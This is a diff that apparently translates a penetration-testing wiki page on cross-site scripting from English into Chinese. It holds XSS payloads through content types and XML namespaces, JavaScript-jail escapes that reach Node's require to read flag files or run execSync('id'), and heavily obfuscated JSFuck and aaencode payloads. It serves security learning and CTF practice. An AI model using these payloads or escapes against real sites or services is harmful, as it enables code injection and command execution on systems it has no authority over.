+如果你发现可以**在302重定向响应中注入头**，你可以尝试**让浏览器执行任意JavaScript**。这**并不简单**，因为现代浏览器在HTTP响应状态码为302时不会解释HTTP响应体，因此仅仅一个跨站脚本有效载荷是无用的。
 
-If you find that you can **inject headers in a 302 Redirect response** you could try to **make the browser execute arbitrary JavaScript**. This is **not trivial** as modern browsers do not interpret the HTTP response body if the HTTP response status code is a 302, so just a cross-site scripting payload is useless.
+在[**这份报告**](https://www.gremwell.com/firefox-xss-302)和[**这份报告**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/)中，你可以阅读如何在Location头中测试几种协议，并查看其中是否有任何协议允许浏览器检查并执行体内的XSS有效载荷。\
+已知的过去协议：`mailto://`、`//x:1/`、`ws://`、`wss://`、_空Location头_、`resource://`。
 
-In [**this report**](https://www.gremwell.com/firefox-xss-302) and [**this one**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) you can read how you can test several protocols inside the Location header and see if any of them allows the browser to inspect and execute the XSS payload inside the body.\
-Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location header_, `resource://`.
+### 仅限字母、数字和点
 
-### Only Letters, Numbers and Dots
+如果你能够指示javascript将要**执行**的**回调**仅限于这些字符。[**阅读这篇文章的这一部分**](./#javascript-function)以了解如何利用这种行为。
 
-If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars. [**Read this section of this post**](./#javascript-function) to find how to abuse this behaviour.
+### 有效的`<script>`内容类型以进行XSS
 
-### Valid `<script>` Content-Types to XSS
+（来自[**这里**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)）如果你尝试加载一个**内容类型**为`application/octet-stream`的脚本，Chrome将抛出以下错误：
 
-(From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) If you try to load a script with a **content-type** such as `application/octet-stream`, Chrome will throw following error:
-
-> Refused to execute script from ‘[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx') because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.
-
-The only **Content-Type**s that will support Chrome to run a **loaded script** are the ones inside the const **`kSupportedJavascriptTypes`** from [https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)
+> 拒绝从‘[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx')执行脚本，因为其MIME类型（‘application/octet-stream’）不可执行，并且启用了严格的MIME类型检查。
 
+唯一支持Chrome运行**加载脚本**的**Content-Type**是来自[https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)的常量**`kSupportedJavascriptTypes`**中的类型。
 ```c
 const char* const kSupportedJavascriptTypes[] = {
-    "application/ecmascript",
-    "application/javascript",
-    "application/x-ecmascript",
-    "application/x-javascript",
-    "text/ecmascript",
-    "text/javascript",
-    "text/javascript1.0",
-    "text/javascript1.1",
-    "text/javascript1.2",
-    "text/javascript1.3",
-    "text/javascript1.4",
-    "text/javascript1.5",
-    "text/jscript",
-    "text/livescript",
-    "text/x-ecmascript",
-    "text/x-javascript",
+"application/ecmascript",
+"application/javascript",
+"application/x-ecmascript",
+"application/x-javascript",
+"text/ecmascript",
+"text/javascript",
+"text/javascript1.0",
+"text/javascript1.1",
+"text/javascript1.2",
+"text/javascript1.3",
+"text/javascript1.4",
+"text/javascript1.5",
+"text/jscript",
+"text/livescript",
+"text/x-ecmascript",
+"text/x-javascript",
 };
 
 ```
-
 ### Script Types to XSS
 
-(From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) So, which types could be indicated to load a script?
-
+(来自 [**这里**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) 那么，哪些类型可以指示加载脚本？
 ```html
 <script type="???"></script>
 ```
-
-The answer is:
-
-- **module** (default, nothing to explain)
-- [**webbundle**](https://web.dev/web-bundles/): Web Bundles is a feature that you can package a bunch of data (HTML, CSS, JS…) together into a **`.wbn`** file.
-
+- **模块**（默认，无需解释）
+- [**webbundle**](https://web.dev/web-bundles/): Web Bundles 是一个功能，您可以将一堆数据（HTML、CSS、JS…）打包到一个 **`.wbn`** 文件中。
 ```html
 <script type="webbundle">
-  {
-     "source": "https://example.com/dir/subresources.wbn",
-     "resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
-  }
+{
+"source": "https://example.com/dir/subresources.wbn",
+"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
+}
 </script>
 The resources are loaded from the source .wbn, not accessed via HTTP
 ```
-
-- [**importmap**](https://github.com/WICG/import-maps)**:** Allows to improve the import syntax
-
+- [**importmap**](https://github.com/WICG/import-maps)**:** 允许改进导入语法
 ```html
 <script type="importmap">
-  {
-    "imports": {
-      "moment": "/node_modules/moment/src/moment.js",
-      "lodash": "/node_modules/lodash-es/lodash.js"
-    }
-  }
+{
+"imports": {
+"moment": "/node_modules/moment/src/moment.js",
+"lodash": "/node_modules/lodash-es/lodash.js"
+}
+}
 </script>
 
 <!-- With importmap you can do the following -->
 <script>
-  import moment from "moment"
-  import { partition } from "lodash"
+import moment from "moment"
+import { partition } from "lodash"
 </script>
 ```
+这种行为在 [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) 中被用来重新映射一个库到 eval，以滥用它可以触发 XSS。
 
-This behaviour was used in [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) to remap a library to eval to abuse it can trigger XSS.
-
-- [**speculationrules**](https://github.com/WICG/nav-speculation)**:** This feature is mainly to solve some problems caused by pre-rendering. It works like this:
-
+- [**speculationrules**](https://github.com/WICG/nav-speculation)**:** 这个功能主要是为了解决一些由预渲染引起的问题。它的工作原理是：
 ```html
 <script type="speculationrules">
-  {
-    "prerender": [
-      { "source": "list", "urls": ["/page/2"], "score": 0.5 },
-      {
-        "source": "document",
-        "if_href_matches": ["https://*.wikipedia.org/**"],
-        "if_not_selector_matches": [".restricted-section *"],
-        "score": 0.1
-      }
-    ]
-  }
+{
+"prerender": [
+{ "source": "list", "urls": ["/page/2"], "score": 0.5 },
+{
+"source": "document",
+"if_href_matches": ["https://*.wikipedia.org/**"],
+"if_not_selector_matches": [".restricted-section *"],
+"score": 0.1
+}
+]
+}
 </script>
 ```
-
 ### Web Content-Types to XSS
 
-(From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) The following content types can execute XSS in all browsers:
+(来自 [**这里**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) 以下内容类型可以在所有浏览器中执行 XSS：
 
 - text/html
 - application/xhtml+xml
 - application/xml
 - text/xml
 - image/svg+xml
-- text/plain (?? not in the list but I think I saw this in a CTF)
-- application/rss+xml (off)
-- application/atom+xml (off)
+- text/plain (?? 不在列表中，但我想我在 CTF 中见过这个)
+- application/rss+xml (关闭)
+- application/atom+xml (关闭)
 
-In other browsers other **`Content-Types`** can be used to execute arbitrary JS, check: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md)
+在其他浏览器中，其他 **`Content-Types`** 可以用来执行任意 JS，查看: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md)
 
 ### xml Content Type
 
-If the page is returnin a text/xml content-type it's possible to indicate a namespace and execute arbitrary JS:
-
+如果页面返回的是 text/xml 内容类型，可以指示一个命名空间并执行任意 JS：
 ```xml
 <xml>
 <text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
@@ -1038,23 +945,21 @@ If the page is returnin a text/xml content-type it's possible to indicate a name
 
 <!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->
 ```
+### 特殊替换模式
 
-### Special Replacement Patterns
+当使用类似 **`"some {{template}} data".replace("{{template}}", <user_input>)`** 的代码时，攻击者可以使用 [**特殊字符串替换**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#specifying_a_string_as_the_replacement) 来尝试绕过某些保护措施： `` "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"})) ``
 
-When something like **`"some {{template}} data".replace("{{template}}", <user_input>)`** is used. The attacker could use [**special string replacements**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#specifying_a_string_as_the_replacement) to try to bypass some protections: `` "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"})) ``
+例如，在 [**这篇文章**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA) 中，这被用来 **转义脚本中的 JSON 字符串** 并执行任意代码。
 
-For example in [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), this was used to **scape a JSON string** inside a script and execute arbitrary code.
-
-### Chrome Cache to XSS
+### Chrome 缓存到 XSS
 
 {{#ref}}
 chrome-cache-to-xss.md
 {{#endref}}
 
-### XS Jails Escape
-
-If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems:
+### XS 监狱逃逸
 
+如果您只能使用有限的字符集，请查看这些其他有效的解决方案以解决 XSJail 问题：
 ```javascript
 // eval + unescape + regex
 eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
@@ -1063,117 +968,107 @@ eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequir
 // use of with
 with(console)log(123)
 with(/console.log(1)/)with(this)with(constructor)constructor(source)()
-  // Just replace console.log(1) to the real code, the code we want to run is:
-  //return String(process.mainModule.require('fs').readFileSync('flag.txt'))
+// Just replace console.log(1) to the real code, the code we want to run is:
+//return String(process.mainModule.require('fs').readFileSync('flag.txt'))
 
 with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
 with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
 with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
 
-  //Final solution
+//Final solution
 with(
-  /with(String)
-    with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
-      with(mainModule)
-        with(require(k))
-          return(String(readFileSync(n)))
-  /)
+/with(String)
+with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
+with(mainModule)
+with(require(k))
+return(String(readFileSync(n)))
+/)
 with(this)
-  with(constructor)
-    constructor(source)()
+with(constructor)
+constructor(source)()
 
 // For more uses of with go to challenge misc/CaaSio PSE in
 // https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
 ```
+如果在执行不受信任的代码之前**一切都是未定义的**（如在[**这篇文章**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)中所述），则可以“凭空”生成有用的对象，以滥用任意不受信任代码的执行：
 
-If **everything is undefined** before executing untrusted code (like in [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)) it's possible to generate useful objects "out of nothing" to abuse the execution of arbitrary untrusted code:
-
-- Using import()
-
+- 使用 import()
 ```javascript
 // although import "fs" doesn’t work, import('fs') does.
 import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8")))
 ```
+- 间接访问 `require`
 
-- Accessing `require` indirectly
-
-[According to this](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) modules are wrapped by Node.js within a function, like this:
-
+[根据这个](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050)，模块在 Node.js 中被包装在一个函数内，如下所示：
 ```javascript
 ;(function (exports, require, module, __filename, __dirname) {
-  // our actual module code
+// our actual module code
 })
 ```
-
-Therefore, if from that module we can **call another function**, it's possible to use `arguments.callee.caller.arguments[1]` from that function to access **`require`**:
-
+因此，如果从该模块我们可以**调用另一个函数**，则可以从该函数使用 `arguments.callee.caller.arguments[1]` 来访问 **`require`**：
 ```javascript
 ;(function () {
-  return arguments.callee.caller.arguments[1]("fs").readFileSync(
-    "/flag.txt",
-    "utf8"
-  )
+return arguments.callee.caller.arguments[1]("fs").readFileSync(
+"/flag.txt",
+"utf8"
+)
 })()
 ```
-
-In a similar way to the previous example, it's possible to **use error handlers** to access the **wrapper** of the module and get the **`require`** function:
-
+以与前一个示例类似的方式，可以**使用错误处理程序**访问模块的**包装器**并获取**`require`**函数：
 ```javascript
 try {
-  null.f()
+null.f()
 } catch (e) {
-  TypeError = e.constructor
+TypeError = e.constructor
 }
 Object = {}.constructor
 String = "".constructor
 Error = TypeError.prototype.__proto__.constructor
 function CustomError() {
-  const oldStackTrace = Error.prepareStackTrace
-  try {
-    Error.prepareStackTrace = (err, structuredStackTrace) =>
-      structuredStackTrace
-    Error.captureStackTrace(this)
-    this.stack
-  } finally {
-    Error.prepareStackTrace = oldStackTrace
-  }
+const oldStackTrace = Error.prepareStackTrace
+try {
+Error.prepareStackTrace = (err, structuredStackTrace) =>
+structuredStackTrace
+Error.captureStackTrace(this)
+this.stack
+} finally {
+Error.prepareStackTrace = oldStackTrace
+}
 }
 function trigger() {
-  const err = new CustomError()
-  console.log(err.stack[0])
-  for (const x of err.stack) {
-    // use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
-    const fn = x.getFunction()
-    console.log(String(fn).slice(0, 200))
-    console.log(fn?.arguments)
-    console.log("=".repeat(40))
-    if ((args = fn?.arguments)?.length > 0) {
-      req = args[1]
-      console.log(req("child_process").execSync("id").toString())
-    }
-  }
+const err = new CustomError()
+console.log(err.stack[0])
+for (const x of err.stack) {
+// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
+const fn = x.getFunction()
+console.log(String(fn).slice(0, 200))
+console.log(fn?.arguments)
+console.log("=".repeat(40))
+if ((args = fn?.arguments)?.length > 0) {
+req = args[1]
+console.log(req("child_process").execSync("id").toString())
+}
+}
 }
 trigger()
 ```
+### 混淆与高级绕过
 
-### Obfuscation & Advanced Bypass
-
-- **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
+- **同一页面中的不同混淆：** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
 - [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
 - [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
 - [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
 - [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/)
 - [http://www.jsfuck.com/](http://www.jsfuck.com)
-- More sofisticated JSFuck: [https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
+- 更复杂的 JSFuck: [https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
 - [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
 - [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html)
 - [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)
-
 ```javascript
 //Katana
 <script>
-  ([,ウ,,,,ア]=[]+{}
-  ,[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
+([,ウ,,,,ア]=[]+{}
+,[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
 </script>
 ```
 
@@ -1185,7 +1080,7 @@ trigger()
 ```javascript
 //JSFuck
 <script>
-  (+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
+(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
 </script>
 ```
 
@@ -1196,168 +1091,166 @@ o = ﾟｰﾟ = _ = 3
 c = ﾟΘﾟ = ﾟｰﾟ - ﾟｰﾟ
 ﾟДﾟ = ﾟΘﾟ = (o ^ _ ^ o) / (o ^ _ ^ o)
 ﾟДﾟ = {
-  ﾟΘﾟ: "_",
-  ﾟωﾟﾉ: ((ﾟωﾟﾉ == 3) + "_")[ﾟΘﾟ],
-  ﾟｰﾟﾉ: (ﾟωﾟﾉ + "_")[o ^ _ ^ (o - ﾟΘﾟ)],
-  ﾟДﾟﾉ: ((ﾟｰﾟ == 3) + "_")[ﾟｰﾟ],
+ﾟΘﾟ: "_",
+ﾟωﾟﾉ: ((ﾟωﾟﾉ == 3) + "_")[ﾟΘﾟ],
+ﾟｰﾟﾉ: (ﾟωﾟﾉ + "_")[o ^ _ ^ (o - ﾟΘﾟ)],
+ﾟДﾟﾉ: ((ﾟｰﾟ == 3) + "_")[ﾟｰﾟ],
 }
 ﾟДﾟ[ﾟΘﾟ] = ((ﾟωﾟﾉ == 3) + "_")[c ^ _ ^ o]
 ﾟДﾟ["c"] = (ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ - ﾟΘﾟ]
 ﾟДﾟ["o"] = (ﾟДﾟ + "_")[ﾟΘﾟ]
 ﾟoﾟ =
-  ﾟДﾟ["c"] +
-  ﾟДﾟ["o"] +
-  (ﾟωﾟﾉ + "_")[ﾟΘﾟ] +
-  ((ﾟωﾟﾉ == 3) + "_")[ﾟｰﾟ] +
-  (ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
-  ((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
-  ((ﾟｰﾟ == 3) + "_")[ﾟｰﾟ - ﾟΘﾟ] +
-  ﾟДﾟ["c"] +
-  (ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
-  ﾟДﾟ["o"] +
-  ((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ]
+ﾟДﾟ["c"] +
+ﾟДﾟ["o"] +
